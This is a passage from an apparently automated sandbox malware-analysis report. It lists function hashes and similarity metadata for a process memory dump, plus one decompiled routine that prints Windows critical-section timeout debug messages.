                                                                                              • Instruction Fuzzy Hash: 2C90026160610802D25071595418716005697D0341F52D021A1414554DC6998A55B7E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9770 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b03875096684b8ea9febf6c1ab9de2417c74992d4dd42e8013b86747fdd21130
                                                                                              • Instruction ID: d3f2e2d8ff0c4a4708df71a52657528ba382eb80f9e37d12b3cd02eefb7bbbde
                                                                                              • Opcode Fuzzy Hash: b03875096684b8ea9febf6c1ab9de2417c74992d4dd42e8013b86747fdd21130
                                                                                              • Instruction Fuzzy Hash: 8990026120614842D21065595408A16004697D0345F52D021A2454595DC6758851F271
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009EA770 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e20f350a56c5e962a538e4a795ec6920507ef8e9f5874837531d1518208fcb88
                                                                                              • Instruction ID: 88cebc68f76043856a43d1bc4ed839e04d942b5f0c45765ef0fa58f9c6bac438
                                                                                              • Opcode Fuzzy Hash: e20f350a56c5e962a538e4a795ec6920507ef8e9f5874837531d1518208fcb88
                                                                                              • Instruction Fuzzy Hash: 9090027520614842D61065595804A97004697D0345F52D421A181459CD86948861F261
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9760 Relevance: .0, Instructions: 4COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f6875cff2ce80f19b564e920696244e9dedf61e121d2d8f27af2422d7282534f
                                                                                              • Instruction ID: 96c81ee2d556e0dd2828d93a0a65789bce18bde779f4f394d2a8c3af5c677e3c
                                                                                              • Opcode Fuzzy Hash: f6875cff2ce80f19b564e920696244e9dedf61e121d2d8f27af2422d7282534f
                                                                                              • Instruction Fuzzy Hash: 6490027120210803D21061595508717004697D0341F52D421A1814558DD6968851B261
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 009E9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                              • Instruction ID: ef89023af22195433eb4aa904635c53b312b0c6b66963696e8114554e886f062
                                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                              • Instruction Fuzzy Hash:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00A3FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 53%
                                                                                              			E00A3FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E009ECE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00A35720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00A35720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                                              0x00a3fdda
                                                                                              0x00a3fde2
                                                                                              0x00a3fde5
                                                                                              0x00a3fdec
                                                                                              0x00a3fdfa
                                                                                              0x00a3fdff
                                                                                              0x00a3fe0a
                                                                                              0x00a3fe0f
                                                                                              0x00a3fe17
                                                                                              0x00a3fe1e
                                                                                              0x00a3fe19
                                                                                              0x00a3fe19
                                                                                              0x00a3fe19
                                                                                              0x00a3fe20
                                                                                              0x00a3fe21
                                                                                              0x00a3fe22
                                                                                              0x00a3fe25
                                                                                              0x00a3fe40

                                                                                              APIs
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A3FDFA
                                                                                              Strings
                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00A3FE01
                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00A3FE2B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.352445837.0000000000980000.00000040.00001000.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_980000_vfpbkeeo.jbxd
                                                                                              Similarity
                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                                              • API String ID: 885266447-3903918235
                                                                                              • Opcode ID: 53c85d986bca7d57e30349e73a246c9106e16032ba3960a61df13545a11160a3
                                                                                              • Instruction ID: 4753bda4b36d6a64dabc367cd8413f0d77cd931b01658599b915418df4cf182b
                                                                                              • Opcode Fuzzy Hash: 53c85d986bca7d57e30349e73a246c9106e16032ba3960a61df13545a11160a3
                                                                                              • Instruction Fuzzy Hash: C0F0F672640601BFDA201B59DC02F23BB6AEB84730F240314F668565E1EA62FC2096F0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%